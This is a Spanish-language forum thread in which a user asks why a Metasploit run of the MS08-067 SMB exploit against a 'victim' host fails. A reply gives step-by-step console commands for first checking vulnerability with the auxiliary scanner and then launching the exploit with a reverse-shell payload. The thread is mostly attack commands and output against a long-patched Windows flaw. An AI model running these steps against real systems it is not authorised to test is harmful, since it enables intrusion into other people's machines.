msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
- Started reverse TCP handler on 192.168.1.XXX:4444
- 192.168.1.XXX:445 - Automatically detecting the target...
- 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
- 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
- Exploit completed, but no session was created. <<<<< porque????
msf5 exploit(windows/smb/ms08_067_netapi) >
que estoy haciendo mal?
Cita de: nightcode en 22 Julio 2019, 03:10 AM
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
- Started reverse TCP handler on 192.168.1.XXX:4444
- 192.168.1.XXX:445 - Automatically detecting the target...
- 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
- 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
- Exploit completed, but no session was created. <<<<< porque????
msf5 exploit(windows/smb/ms08_067_netapi) >
que estoy haciendo mal?
Ni siquiera especificas que version estas atacando..
windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.
Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.
Has un escaneo para verificar si es vulnerable..
> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run
#Luego se vuleve a proceder:
> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit
Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...
Cita de: AguijoN_ZerO en 3 Agosto 2019, 03:36 AM
Ni siquiera especificas que version estas atacando..
windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.
Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.
Has un escaneo para verificar si el vulnerable..
> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run
#Luego se vuleve a proceder:
> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit
Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...
windows 2008 r2 solucionado imagino que la version que ataque estaba parchada. no sabia que tenia auxiliar este exploit por eso no logre chekear primero...
gracias por tu respuesta Dexter xD
Cita de: nightcode en 4 Agosto 2019, 04:20 AM
windows 2008 r2 solucionado imagino que la version que ataque estaba parchada. no sabia que tenia auxiliar este exploit por eso no logre chekear primero...
gracias por tu respuesta Dexter xD
No fue nada, gracias por la pregunta Didi .. Habia olvidado esa caricatura.. XDD